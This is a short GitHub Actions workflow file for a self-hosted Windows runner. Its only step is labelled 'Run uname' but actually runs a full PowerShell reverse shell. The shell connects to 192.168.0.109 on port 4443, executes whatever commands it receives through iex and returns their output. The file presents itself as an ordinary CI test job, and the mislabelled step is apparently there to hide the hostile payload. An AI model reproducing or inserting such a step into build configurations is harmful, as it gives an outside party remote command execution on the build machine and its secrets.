name: self-hosted-runner

on:
    workflow_dispatch

jobs:
    test-linux-job:
        name: "Test Runner"
        runs-on: [self-hosted, Windows, x64, PsGeek]
        steps:
            - name: "Run uname"
              run: |
               powershell -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.0.109',4443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PSReverseShell# ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}$client.Close();"
